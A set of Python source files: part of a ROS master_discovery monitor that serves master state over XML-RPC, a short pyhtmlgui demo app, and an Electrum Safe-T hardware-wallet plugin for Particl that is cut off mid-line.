:param rpcport: the port number for the XML-RPC server :type rpcport: int :param do_retry: retry to create XML-RPC server :type do_retry: bool :param ipv6: Use ipv6 :type ipv6: bool ''' self._state_access_lock = threading.RLock() self._create_access_lock = threading.RLock() self._lock = threading.RLock() self.__masteruri = masteruri_from_ros() self.__new_master_state = None self.__masteruri_rpc = None self.__mastername = None self.__cached_nodes = dict() self.__cached_services = dict() self.ros_node_name = str(rospy.get_name()) if rospy.has_param('~name'): self.__mastername = rospy.get_param('~name') self.__mastername = self.getMastername() rospy.set_param('/mastername', self.__mastername) self.__master_state = None '''the current state of the ROS master''' self.rpcport = rpcport '''the port number of the RPC server''' self._printed_errors = dict() self._last_clearup_ts = time.time() self._master_errors = list() # Create an XML-RPC server self.ready = False while not self.ready and not rospy.is_shutdown(): try: RPCClass = RPCThreading if ipv6: RPCClass = RPCThreadingV6 self.rpcServer = RPCClass((rpc_addr, rpcport), logRequests=False, allow_none=True) rospy.loginfo("Start RPC-XML Server at %s", self.rpcServer.server_address) self.rpcServer.register_introspection_functions() self.rpcServer.register_function(self.getListedMasterInfo, 'masterInfo') self.rpcServer.register_function(self.getListedMasterInfoFiltered, 'masterInfoFiltered') self.rpcServer.register_function(self.getMasterContacts, 'masterContacts') self.rpcServer.register_function(self.getMasterErrors, 'masterErrors') self.rpcServer.register_function(self.getCurrentTime, 'getCurrentTime') self.rpcServer.register_function(self.setTime, 'setTime') self.rpcServer.register_function(self.getTopicsMd5sum, 'getTopicsMd5sum') self.rpcServer.register_function(self.getUser, 'getUser') self._rpcThread = threading.Thread(target=self.rpcServer.serve_forever) self._rpcThread.setDaemon(True) self._rpcThread.start() self.ready = True except socket.error as e: if not do_retry: raise Exception("Error while start RPC-XML server on port %d: %s\nIs a Node Manager already running?" % (rpcport, e)) rospy.logwarn("Error while start RPC-XML server on port %d: %s\nTry again..." 
% (rpcport, e)) time.sleep(1) except: print(traceback.format_exc()) if not do_retry: raise self._master = xmlrpcclient.ServerProxy(self.getMasteruri()) # Hide parameter self._re_hide_nodes = gen_pattern(rospy.get_param('~hide_nodes', []), 'hide_nodes') self._re_hide_topics = gen_pattern(rospy.get_param('~hide_topics', []), 'hide_topics') self._re_hide_services = gen_pattern(rospy.get_param('~hide_services', []), 'hide_services') # === UPDATE THE LAUNCH URIS Section === # subscribe to get parameter updates rospy.loginfo("Subscribe to parameter `/roslaunch/uris`") self.__mycache_param_server = rospy.impl.paramserver.get_param_server_cache() # HACK: use own method to get the updates also for parameters in the subgroup self.__mycache_param_server.update = self.__update_param # first access, make call to parameter server self._update_launch_uris_lock = threading.RLock() self.__launch_uris = {} code, msg, value = self._master.subscribeParam(self.ros_node_name, rospy.get_node_uri(), '/roslaunch/uris') # the new timer will be created in self._update_launch_uris() self._timer_update_launch_uris = None if code == 1: for k, v in value.items(): self.__launch_uris[roslib.names.ns_join('/roslaunch/uris', k)] = v self._update_launch_uris() # === END: UPDATE THE LAUNCH URIS Section === def __update_param(self, key, value): # updates the /roslaunch/uris parameter list with self._update_launch_uris_lock: try: if value: self.__launch_uris[key] = value else: del self.__launch_uris[key] except: pass def shutdown(self): ''' Shutdown the RPC Server. ''' if self._timer_update_launch_uris is not None: try: self._timer_update_launch_uris.cancel() except Exception: pass if hasattr(self, 'rpcServer'): if self._master is not None: rospy.loginfo("Unsubscribe from parameter `/roslaunch/uris`") try: self._master.unsubscribeParam(self.ros_node_name, rospy.get_node_uri(), '/roslaunch/uris') except Exception as e: rospy.logwarn("Error while unsubscribe from `/roslaunch/uris`: %s" % e) rospy.loginfo("shutdown own RPC server") self.rpcServer.shutdown() del self.rpcServer.socket del self.rpcServer def is_running(self): return hasattr(self, 'rpcServer') def _update_launch_uris(self, params={}): with self._update_launch_uris_lock: if params: self.__launch_uris = params try: socket.setdefaulttimeout(3.0) for key, value in self.__launch_uris.items(): try: # contact the launch server launch_server = xmlrpcclient.ServerProxy(value) c, m, pid = launch_server.get_pid() except: try: # remove the parameter from parameter server on error master = xmlrpcclient.ServerProxy(self.getMasteruri()) master.deleteParam(self.ros_node_name, key) except: pass finally: socket.setdefaulttimeout(None) # create the new timer if not rospy.is_shutdown(): self._timer_update_launch_uris = threading.Timer(self.INTERVAL_UPDATE_LAUNCH_URIS, self._update_launch_uris) self._timer_update_launch_uris.start() def _getNodePid(self, nodes): ''' Gets process id of the node. This method blocks until the info is retrieved or socket timeout is reached (0.7 seconds). 
:param nodename: the name of the node :type nodename: str :param uri: the uri of the node :type uri: str ''' for (nodename, uri) in nodes.items(): if uri is not None: pid = None try: with self._lock: if nodename in self.__cached_nodes: if time.time() - self.__cached_nodes[nodename][2] < self.MAX_PING_SEC: return socket.setdefaulttimeout(0.7) node = xmlrpcclient.ServerProxy(uri) pid = _succeed(node.getPid(self.ros_node_name)) except (Exception, socket.error) as e: with self._lock: self._limited_log(nodename, "can't get PID: %s" % str(e), level=rospy.DEBUG) master = xmlrpcclient.ServerProxy(self.getMasteruri()) code, message, new_uri = master.lookupNode(self.ros_node_name, nodename) with self._lock: self.__new_master_state.getNode(nodename).uri = None if (code == -1) else new_uri if code == -1: self._limited_log(nodename, "can't update contact information. ROS master responds with: %s" % message) try: del self.__cached_nodes[nodename] except: pass else: with self._lock: self.__new_master_state.getNode(nodename).pid = pid self.__cached_nodes[nodename] = (uri, pid, time.time()) # print "_getNodePid _lock RET", threading.current_thread() finally: socket.setdefaulttimeout(None) def _getServiceInfo(self, services): ''' Gets service info through the RPC interface of the service. This method blocks until the info is retrieved or socket timeout is reached (0.5 seconds). :param service: the name of the service :type service: str :param uri: the uri of the service :type uri: str ''' for (service, uri) in services.items(): with self._lock: if service in self.__cached_services: if time.time() - self.__cached_services[service][2] < self.MAX_PING_SEC: return if uri is not None: dest_addr = dest_port = None try: dest_addr, dest_port = rospy.parse_rosrpc_uri(uri) except: continue # raise ROSServiceException("service [%s] has an invalid RPC URI [%s]"%(service, uri)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # connect to service and probe it to get the headers s.settimeout(0.5) s.connect((dest_addr, dest_port)) header = {'probe': '1', 'md5sum': '*', 'callerid': self.ros_node_name, 'service': service} roslib.network.write_ros_handshake_header(s, header) buf = io.StringIO() if sys.version_info < (3, 0) else io.BytesIO() stype = roslib.network.read_ros_handshake_header(s, buf, 2048) with self._lock: self.__new_master_state.getService(service).type = stype['type'] self.__cached_services[service] = (uri, stype['type'], time.time()) except socket.error: with self._lock: try: del self.__cached_services[service] except: pass # raise ROSServiceIOException("Unable to communicate with service [%s], address [%s]"%(service, uri)) except: with self._lock: self._limited_log(service, "can't get service type: %s" % traceback.format_exc(), level=rospy.DEBUG) with self._lock: try: del self.__cached_services[service] except: pass pass finally: if s is not None: s.close() def getListedMasterInfo(self): ''' :return: a extended ROS Master State. :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo.listedState()` for result type ''' t = str(time.time()) result = (t, t, self.getMasteruri(), str(self.getMastername()), [], [], [], [], [], []) if not (self.__master_state is None): try: with self._state_access_lock: result = self.__master_state.listedState() except: print(traceback.format_exc()) return result def getListedMasterInfoFiltered(self, filter_list): ''' :return: a extended filtered ROS Master State. 
:rtype: :mod:`fkie_master_discovery.master_info.MasterInfo.listedState()` for result type ''' t = str(time.time()) result = (t, t, self.getMasteruri(), str(self.getMastername()), [], [], [], [], [], []) if not (self.__master_state is None): try: with self._state_access_lock: fi = FilterInterface.from_list(filter_list) fi.set_hide_pattern(self._re_hide_nodes, self._re_hide_topics, self._re_hide_services) result = self.__master_state.listedState(fi) except: print(traceback.format_exc()) return result def getCurrentState(self): ''' :return: The current ROS Master State :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo` or ``None`` ''' with self._state_access_lock: return self.__master_state def updateState(self, clear_cache=False): ''' Gets state from the ROS Master through his RPC interface. :param clear_cache: The URI of nodes and services will be cached to reduce the load. If remote hosted nodes or services was restarted, the cache must be cleared! The local nodes will be updated periodically after :mod:`fkie_master_discovery.master_monitor.MasterMonitor.MAX_PING_SEC`. :type clear_cache: bool (Default: ``False``) :rtype: :mod:`fkie_master_discovery.master_info.MasterInfo` :raise: ``MasterConnectionException``, if not complete information was get from the ROS master. ''' with self._create_access_lock: now = time.time() threads = [] try: self._lock.acquire(True) if clear_cache: self.__cached_nodes = dict() self.__cached_services = dict() socket.setdefaulttimeout(5) self.__new_master_state = master_state = MasterInfo(self.getMasteruri(), self.getMastername()) # update master state master = self._master # master = xmlrpclib.ServerProxy(self.getMasteruri()) # get topic types code, message, topicTypes = master.getTopicTypes(self.ros_node_name) # convert topicType list to the dict topicTypesDict = {} for topic, type in topicTypes: topicTypesDict[topic] = type # get system state code, message, state = master.getSystemState(self.ros_node_name) # add published topics for t, l in state[0]: master_state.topics = t for n in l: master_state.nodes = n master_state.getNode(n).publishedTopics = t master_state.getTopic(t).publisherNodes = n master_state.getTopic(t).type = topicTypesDict.get(t, 'None') # add subscribed topics for t, l in state[1]: master_state.topics = t for n in l: master_state.nodes = n master_state.getNode(n).subscribedTopics = t master_state.getTopic(t).subscriberNodes = n master_state.getTopic(t).type = topicTypesDict.get(t, 'None') # add services services = dict() tmp_slist = [] # multi-call style xmlrpc to lock up the service uri param_server_multi = xmlrpcclient.MultiCall(master) for t, l in state[2]: master_state.services = t for n in l: master_state.nodes = n master_state.getNode(n).services = t service = master_state.getService(t) service.serviceProvider = n if service.name in self.__cached_services: service.uri = self.__cached_services[service.name][0] service.type = self.__cached_services[service.name][1] if service.isLocal and time.time() - self.__cached_services[service.name][2] > self.MAX_PING_SEC: services[service.name] = service.uri else: tmp_slist.append(service) param_server_multi.lookupService(self.ros_node_name, t) try: r = param_server_multi() for (code, msg, uri), service in zip(r, tmp_slist): if code == 1: service.uri = uri if service.isLocal: services[service.name] = uri else: self.__cached_services[service.name] = (uri, None, time.time()) else: with self._lock: self._limited_log(service.name, "can't get contact information. 
ROS master responds with: %s" % msg) except: traceback.print_exc() if services: pidThread = threading.Thread(target=self._getServiceInfo, args=((services,))) pidThread.start() threads.append(pidThread) # get additional node information nodes = dict() try: # multi-call style xmlrpc to loock up the node uri param_server_multi = xmlrpcclient.MultiCall(master) tmp_nlist = [] for name, node in master_state.nodes.items(): if node.name in self.__cached_nodes: node.uri = self.__cached_nodes[node.name][0] node.pid = self.__cached_nodes[node.name][1] if node.isLocal and time.time() - self.__cached_nodes[node.name][2] > self.MAX_PING_SEC: nodes[node.name] = node.uri else: # 'print "request node:", node.name tmp_nlist.append(node) param_server_multi.lookupNode(self.ros_node_name, name) r = param_server_multi() for (code, msg, uri), node in zip(r, tmp_nlist): if code == 1: node.uri = uri if node.isLocal: nodes[node.name] = uri else: self.__cached_nodes[node.name] = (uri, None, time.time()) else: with self._lock: self._limited_log(node.name, "can't get contact information. ROS master responds with: %s" % msg) except: traceback.print_exc() if nodes: # get process id of the nodes pidThread = threading.Thread(target=self._getNodePid, args=((nodes,))) pidThread.start() threads.append(pidThread) master_state.timestamp = now except socket.error as e: if isinstance(e, tuple): (errn, msg) = e if errn not in [100, 101, 102]: formatted_lines = traceback.format_exc().splitlines() raise MasterConnectionException(formatted_lines[-1]) else: raise MasterConnectionException(traceback.format_exc(1)) except: formatted_lines = traceback.format_exc().splitlines() raise MasterConnectionException(formatted_lines[-1]) finally: self._lock.release() socket.setdefaulttimeout(None) # wait for all threads are finished while threads: th = threads.pop() if th.is_alive(): th.join() del th if time.time() - self._last_clearup_ts > 300: self._last_clearup_ts = time.time() self._clearup_cached_logs() return master_state def _limited_log(self, provider, msg, level=rospy.WARN): if provider not in self._printed_errors: self._printed_errors[provider] = dict() if msg not in self._printed_errors[provider]: self._printed_errors[provider][msg] = time.time() if level == rospy.DEBUG: rospy.logdebug("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.INFO: rospy.loginfo("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.WARN: rospy.logwarn("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.ERROR: rospy.logerr("MasterMonitor[%s]: %s" % (provider, msg)) elif level == rospy.FATAL: rospy.logfatal("MasterMonitor[%s]: %s" % (provider, msg)) def _clearup_cached_logs(self, age=300): cts = time.time() with self._lock: for p, msgs in list(self._printed_errors.items()): for msg, ts in list(msgs.items()): if cts - ts > age: del self._printed_errors[p][msg] if not self._printed_errors[p]: del self._printed_errors[p] def updateSyncInfo(self): ''' This method can be called to update the origin ROS master URI of the nodes and services in new ``master_state``. This is only need, if a synchronization is running. The synchronization service will be detect automatically by searching for the service ending with ``get_sync_info``. The method will be called by :mod:`fkie_master_discovery.master_monitor.MasterMonitor.checkState()`. 
''' # 'print "updateSyncInfo _create_access_lock try...", threading.current_thread() def getNodeuri(nodename, publisher, subscriber, services): for p in publisher: if nodename == p.node: return p.nodeuri for p in subscriber: if nodename == p.node: return p.nodeuri for s in services: if nodename == s.node: return s.nodeuri return None with self._create_access_lock: master_state = self.__new_master_state sync_info = None # get synchronization info, if sync node is running # to determine the origin ROS MASTER URI of the nodes for name, service in master_state.services.items(): if service.name.endswith('get_sync_info'): if get_hostname(self.getMasteruri()) == get_hostname(service.uri): socket.setdefaulttimeout(3) get_sync_info = rospy.ServiceProxy(service.name, GetSyncInfo) try: sync_info = get_sync_info() except rospy.ServiceException as e: rospy.logwarn("ERROR Service call 'get_sync_info' failed: %s", str(e)) finally: socket.setdefaulttimeout(None) # update the origin ROS MASTER URI of the nodes, if sync node is running if sync_info: for m in sync_info.hosts: for n in m.nodes: try: # TODO: add nodeuri to the nodes (needs changes in the MSG definitions) # set the sync node only if it has the same uri nuri = getNodeuri(n, m.publisher, m.subscriber, m.services) state_node = master_state.getNode(n) if state_node is not None and (state_node.uri == nuri or nuri is None): state_node.masteruri = m.masteruri except: pass for s in m.services: try: state_service = master_state.getService(s.service) if state_service is not None and state_service.uri == s.serviceuri: state_service.masteruri = m.masteruri except: pass def getMasteruri(self): ''' Requests the ROS master URI from the ROS master through the RPC interface and returns it. :return: ROS master URI :rtype: str or ``None`` ''' code = -1 if self.__masteruri_rpc is None: master = xmlrpcclient.ServerProxy(self.__masteruri) code, message, self.__masteruri_rpc = master.getUri(self.ros_node_name) return self.__masteruri_rpc if code >= 0 or self.__masteruri_rpc is not None else self.__masteruri def getMastername(self): ''' Returns the name of the master. If no name is set, the hostname of the ROS master URI will be extracted. :return: the name of the ROS master :rtype: str or ``None`` ''' if self.__mastername is None: try: self.__mastername = get_hostname(self.getMasteruri()) try: master_port = urlparse(self.__masteruri).port if master_port != 11311: self.__mastername = '%s_%d' % (self.__mastername, master_port) except: pass except: pass return self.__mastername def getMasterContacts(self): ''' The RPC method called by XML-RPC server to request the master contact information. :return: (``timestamp of the ROS master state``, ``ROS master URI``, ``master name``, ``name of this service``, ``URI of this RPC server``) :rtype: (str, str, str, str, str) ''' t = 0 if self.__master_state is not None: with self._state_access_lock: t = self.__master_state.timestamp return ('%.9f' % t, str(self.getMasteruri()), str(self.getMastername()), self.ros_node_name, roslib.network.create_local_xmlrpc_uri(self.rpcport)) def getMasterErrors(self): ''' The RPC method called by XML-RPC server to request the occured network errors. :return: (``ROS master URI``, ``list with errors``) :rtype: (str, [str]) ''' return (str(self.getMasteruri()), self._master_errors) def getCurrentTime(self): ''' The RPC method called by XML-RPC server to request the current host time. 
:return: (``ROS master URI``, ``current time``) :rtype: (str, float) ''' return (str(self.getMasteruri()), time.time()) def setTime(self, timestamp): ''' The RPC method called by XML-RPC server to set new host time. :param timestamp: UNIX timestamp :type timestamp: float :return: (``ROS master URI``, ``current time``) :rtype: (str, float) ''' dtime = datetime.fromtimestamp(timestamp) args = ['sudo', '-n', '/bin/date', '-s', '%s' % dtime] rospy.loginfo('Set time: %s' % args) subp = subprocess.Popen(args, stderr=subprocess.PIPE) success = True result_err = '' if subp.stderr is not None: result_err = subp.stderr.read() if result_err: success = False return (str(self.getMasteruri()), success, time.time(), result_err) def getTopicsMd5sum(self, topic_types): ''' :return: a list with topic type and current md5sum. - ``topic types`` is of the form ``[ (topic1, md5sum1) ... ]`` :rtype: list ''' topic_list = [] for ttype in topic_types: try: entry = (ttype, roslib.message.get_message_class(ttype)._md5sum) topic_list.append(entry) except Exception as err: rospy.logwarn(err) return topic_list def getUser(self): ''' The RPC method called by XML-RPC server to request the user name used to launch the master_discovery. :return: (``ROS master URI``, ``user name``) :rtype: (str, str) ''' return (str(self.getMasteruri()), getpass.getuser()) def checkState(self, clear_cache=False): ''' Gets the state from the ROS master and compares it to the stored state. :param clear_cache: The URI of nodes and services will be cached to reduce the load. If remote hosted nodes or services was restarted, the cache must be cleared! The local nodes will be updated periodically after :mod:`fkie_master_discovery.master_monitor.MasterMonitor.MAX_PING_SEC`. :type clear_cache: bool (Default: ``False``) :return: ``True`` if the ROS master state is changed :rtype: bool ''' result = False s = self.updateState(clear_cache) with self._create_access_lock: do_update = False with self._state_access_lock: if s != self.__master_state: do_update = True if self.__master_state is not None and s.timestamp < self.__master_state.timestamp: do_update = True result = True timejump_msg = "Timejump into past detected! Restart all ROS nodes, includes master_discovery, please!" rospy.logwarn(timejump_msg) if timejump_msg not in self._master_errors: self._master_errors.append(timejump_msg) if do_update: self.updateSyncInfo() with self._state_access_lock: # test for local changes ts_local = self.__new_master_state.timestamp_local if self.__master_state is not None and not self.__master_state.has_local_changes(s): ts_local = self.__master_state.timestamp_local self.__master_state = self.__new_master_state self.__master_state.timestamp_local = ts_local result = True self.__master_state.check_ts = self.__new_master_state.timestamp return result def reset(self): ''' Sets the master state to ``None``. ''' with self._state_access_lock: if self.__master_state is not None: del self.__master_state self.__master_state = None def update_master_errors(self, error_list): self._master_errors = list(error_list)
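A small sketch, separate from master_monitor.py, of the timestamp-guarded cache its docstrings describe (the __cached_nodes/__cached_services dictionaries and MAX_PING_SEC): a cached entry is reused until it is older than the ping interval, then re-fetched.

import time

MAX_PING_SEC = 10.0
_cache = {}  # name -> (value, timestamp of last refresh)

def cached_lookup(name, fetch):
    # `fetch` is any callable doing the expensive work, e.g. an XML-RPC call to the node.
    entry = _cache.get(name)
    if entry is not None and time.time() - entry[1] < MAX_PING_SEC:
        return entry[0]
    value = fetch(name)
    _cache[name] = (value, time.time())
    return value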
exampleApp12.py
import time
import threading
import random
from pyhtmlgui import PyHtmlGui, PyHtmlView, Observable


class App(Observable):
    def __init__(self):
        super().__init__()
        self.app_identifier = random.randint(0, 100000)
        self.app_value = self.app_identifier
        self.connected_view_feedback = {}
        self.worker_thread = threading.Thread(target=self._worker_thread, daemon=True)
        self.worker_thread.start()

    def _worker_thread(self):
        while True:
            self.app_value += 1
            self.notifyObservers()
            time.sleep(1)


class AppView(PyHtmlView):
    TEMPLATE_STR = '''
        If you set shared_instance = True, there will be only one AppView for all connected
        clients, so if you open multiple browser windows you will see that the AppView id is
        the same in all views and all views show exactly the same thing. If you use
        shared_instance = False (the default), every connected frontend gets its own session.<br>
        AppView: {{ this.appview_identifier }}, {{ this.appview_value }}<br>
        App: {{ this.observedObject.app_identifier }}, {{ this.observedObject.app_value }}<br>
        Connected frontend feedback: {{ this.connected_frontend_feedback }}
        Connected AppView feedback: {{ this.observedObject.connected_view_feedback }}
    '''

    def __init__(self, observedObject, parentView):
        super().__init__(observedObject, parentView)
        self.appview_identifier = random.randint(0, 100000)
        self.appview_value = self.appview_identifier
        self.worker_thread = threading.Thread(target=self._worker_thread, daemon=True)
        self.worker_thread.start()
        self.connected_frontend_feedback = []

    def _worker_thread(self):
        while True:
            self.appview_value += 1
            if self.is_visible is True:
                # If we call update() ourselves, we need to check visibility first;
                # we cannot update invisible components.
                self.update()
                self.call_javascript("get_frontend_id", [])(self._frontend_feedback)
            time.sleep(1)

    def _frontend_feedback(self, values):
        # values contains the results from all connected frontends
        self.observedObject.connected_view_feedback[self.appview_identifier] = values
        self.connected_frontend_feedback = values


if __name__ == "__main__":
    gui = PyHtmlGui(
        appInstance=App(),
        appViewClass=AppView,
        auto_reload=True,
        static_dir="static",
        template_dir="templates",
        main_html="window.html",
        shared_secret=None,
        single_instance=False,
    )
    gui.start(show_frontend=True, block=True)
safe_t.py
from binascii import hexlify, unhexlify import traceback import sys from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException from electrum.bip32 import BIP32Node from electrum import constants from electrum.i18n import _ from electrum.plugin import Device, runs_in_hwd_thread from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput from electrum.keystore import Hardware_KeyStore from electrum.base_wizard import ScriptTypeNotSupported from ..hw_wallet import HW_PluginBase from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data, get_xpubs_and_der_suffixes_from_txinout) if TYPE_CHECKING: from .client import SafeTClient # Safe-T mini initialization methods TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4) class SafeTKeyStore(Hardware_KeyStore): hw_type = 'safe_t' device = 'Safe-T mini' plugin: 'SafeTPlugin' def get_client(self, force_pair=True): return self.plugin.get_client(self, force_pair) def decrypt_message(self, sequence, message, password): raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device)) @runs_in_hwd_thread def sign_message(self, sequence, message, password, *, script_type=None): client = self.get_client() address_path = self.get_derivation_prefix() + "/%d/%d"%sequence address_n = client.expand_path(address_path) msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message) return msg_sig.signature @runs_in_hwd_thread def sign_transaction(self, tx, password): if tx.is_complete(): return # previous transactions used as inputs prev_tx = {} for txin in tx.inputs(): tx_hash = txin.prevout.txid.hex() if txin.utxo is None and not txin.is_segwit(): raise UserFacingException(_('Missing previous tx for legacy input.')) prev_tx[tx_hash] = txin.utxo self.plugin.sign_transaction(self, tx, prev_tx) class SafeTPlugin(HW_PluginBase): # Derived classes provide: # # class-static variables: client_class, firmware_URL, handler_class, # libraries_available, libraries_URL, minimum_firmware, # wallet_class, types firmware_URL = 'https://safe-t.io' libraries_URL = 'https://github.com/archos-safe-t/python-safet' minimum_firmware = (1, 0, 5) keystore_class = SafeTKeyStore minimum_library = (0, 1, 0) SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh') MAX_LABEL_LEN = 32 def __init__(self, parent, config, name): HW_PluginBase.__init__(self, parent, config, name) self.libraries_available = self.check_libraries_available() if not self.libraries_available: return from . import client from . 
import transport import safetlib.messages self.client_class = client.SafeTClient self.types = safetlib.messages self.DEVICE_IDS = ('Safe-T mini',) self.transport_handler = transport.SafeTTransport() self.device_manager().register_enumerate_func(self.enumerate) def get_library_version(self): import safetlib try: return safetlib.__version__ except AttributeError: return 'unknown' @runs_in_hwd_thread def enumerate(self): devices = self.transport_handler.enumerate_devices() return [Device(path=d.get_path(), interface_number=-1, id_=d.get_path(), product_key='Safe-T mini', usage_page=0, transport_ui_string=d.get_path()) for d in devices] @runs_in_hwd_thread def create_client(self, device, handler): try: self.logger.info(f"connecting to device at {device.path}") transport = self.transport_handler.get_transport(device.path) except BaseException as e: self.logger.info(f"cannot connect at {device.path} {e}") return None if not transport: self.logger.info(f"cannot connect at {device.path}") return self.logger.info(f"connected to device at {device.path}") client = self.client_class(transport, handler, self) # Try a ping for device sanity try: client.ping('t') except BaseException as e: self.logger.info(f"ping failed {e}") return None if not client.atleast_version(*self.minimum_firmware): msg = (_('Outdated {} firmware for device labelled {}. Please ' 'download the updated firmware from {}') .format(self.device, client.label(), self.firmware_URL)) self.logger.info(msg) if handler: handler.show_error(msg) else: raise UserFacingException(msg) return None return client @runs_in_hwd_thread def get_client(self, keystore, force_pair=True, *, devices=None, allow_user_interaction=True) -> Optional['SafeTClient']: client = super().get_client(keystore, force_pair, devices=devices, allow_user_interaction=allow_user_interaction) # returns the client for a given keystore. can use xpub if client: client.used() return client def get_coin_name(self): return "Testnet" if constants.net.TESTNET else "Particl" def initialize_device(self, device_id, wizard, handler): # Initialization method msg = _("Choose how you want to initialize your {}.\n\n" "The first two methods are secure as no secret information " "is entered into your computer.\n\n" "For the last two methods you input secrets on your keyboard " "and upload them to your {}, and so you should " "only do those on a computer you know to be trustworthy " "and free of malware." ).format(self.device, self.device) choices = [ # Must be short as QT doesn't word-wrap radio button text (TIM_NEW, _("Let the device generate a completely new seed randomly")), (TIM_RECOVER, _("Recover from a seed you have previously written down")), (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")), (TIM_PRIVKEY, _("Upload a master private key")) ] def f(method): import threading settings = self.request_safe_t_init_settings(wizard, method, self.device) t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler)) t.setDaemon(True) t.start() exit_code = wizard.loop.exec_() if exit_code != 0: # this method (initialize_device) was called with the expectation # of leaving the device in an initialized state when finishing. 
# signal that this is not the case: raise UserCancelled() wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f) def _initialize_device_safe(self, settings, method, device_id, wizard, handler): exit_code = 0 try: self._initialize_device(settings, method, device_id, wizard, handler) except UserCancelled: exit_code = 1 except BaseException as e: self.logger.exception('') handler.show_error(repr(e)) exit_code = 1 finally: wizard.loop.exit(exit_code) @runs_in_hwd_thread def _initialize_device(self, settings, method, device_id, wizard, handler): item, label, pin_protection, passphrase_protection = settings if method == TIM_RECOVER: handler.show_error(_( "You will be asked to enter 24 words regardless of your " "seed's actual length. If you enter a word incorrectly or " "misspell it, you cannot change it or go back - you will need " "to start again from the beginning.\n\nSo please enter " "the words carefully!"), blocking=True) language = 'english' devmgr = self.device_manager() client = devmgr.client_by_id(device_id) if not client: raise Exception(_("The device was disconnected.")) if method == TIM_NEW: strength = 64 * (item + 2) # 128, 192 or 256 u2f_counter = 0 skip_backup = False client.reset_device(True, strength, passphrase_protection, pin_protection, label, language, u2f_counter, skip_backup) elif method == TIM_RECOVER: word_count = 6 * (item + 2) # 12, 18 or 24 client.step = 0 client.recovery_device(word_count, passphrase_protection, pin_protection, label, language) elif method == TIM_MNEMONIC: pin = pin_protection # It's the pin, not a boolean client.load_device_by_mnemonic(str(item), pin, passphrase_protection, label, language) else: pin = pin_protection # It's the pin, not a boolean client.load_device_by_xprv(item, pin, passphrase_protection, label, language) def _make_node_path(self, xpub, address_n): bip32node = BIP32Node.from_xkey(xpub) node = self.types.HDNodeType( depth=bip32node.depth, fingerprint=int.from_bytes(bip32node.fingerprint, 'big'), child_num=int.from_bytes(bip32node.child_number, 'big'), chain_code=bip32node.chaincode, public_key=bip32node.eckey.get_public_key_bytes(compressed=True), ) return self.types.HDNodePathType(node=node, address_n=address_n) def setup_device(self, device_info, wizard, purpose): device_id = device_info.device.id_ client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard) if not device_info.initialized: self.initialize_device(device_id, wizard, client.handler) wizard.run_task_without_blocking_gui( task=lambda: client.get_xpub("m", 'standard')) client.used() return client def get_xpub(self, device_id, derivation, xtype, wizard): if xtype not in self.SUPPORTED_XTYPES: raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device)) client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard) xpub = client.get_xpub(derivation, xtype) client.used() return xpub def get_safet_input_script_type(self, electrum_txin_type: str): if electrum_txin_type in ('p2wpkh', 'p2wsh'): return self.types.InputScriptType.SPENDWITNESS if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return self.types.InputScriptType.SPENDP2SHWITNESS if electrum_txin_type in ('p2pkh',): return self.types.InputScriptType.SPENDADDRESS if electrum_txin_type in ('p2sh',): return self.types.InputScriptType.SPENDMULTISIG raise ValueError('unexpected txin type: {}'.format(electrum_txin_type)) def get_safet_output_script_type(self, electrum_txin_type: str): if 
electrum_txin_type in ('p2wpkh', 'p2wsh'): return self.types.OutputScriptType.PAYTOWITNESS if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return self.types.OutputScriptType.PAYTOP2SHWITNESS if electrum_txin_type in ('p2pkh',): return self.types.OutputScriptType.PAYTOADDRESS if electrum_txin_type in ('p2sh',): return self.types.OutputScriptType.PAYTOMULTISIG raise ValueError('unexpected txin type: {}'.format(electrum_txin_type)) @runs_in_hwd_thread def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx): self.prev_tx = prev_tx client = self.get_client(keystore) inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore) outputs = self.tx_outputs(tx, keystore=keystore) signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime, version=tx.version)[0] signatures = [(bh2u(x) + '01') for x in signatures] tx.update_signatures(signatures) @runs_in_hwd_thread def show_address(self, wallet, address, keystore=None): if keystore is None: keystore = wallet.get_keystore() if not self.show_address_helper(wallet, address, keystore): return client = self.get_client(keystore) if not client.atleast_version(1, 0): keystore.handler.show_error(_("Your device firmware is too old")) return deriv_suffix = wallet.get_address_index(address) derivation = keystore.get_derivation_prefix() address_path = "%s/%d/%d"%(derivation, *deriv_suffix) address_n = client.expand_path(address_path) script_type = self.get_safet_input_script_type(wallet.txin_type) # prepare multisig, if available: xpubs = wallet.get_master_public_keys() if len(xpubs) > 1: pubkeys = wallet.get_public_keys(address) # sort xpubs using the order of pubkeys sorted_pairs = sorted(zip(pubkeys, xpubs)) multisig = self._make_multisig( wallet.m, [(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs]) else: multisig = None client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type) def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None): inputs = [] for txin in tx.inputs(): txinputtype = self.types.TxInputType() if txin.is_coinbase_input(): prev_hash = b"\x00"*32 prev_index = 0xffffffff # signed int -1 else: if for_sig: assert isinstance(tx, 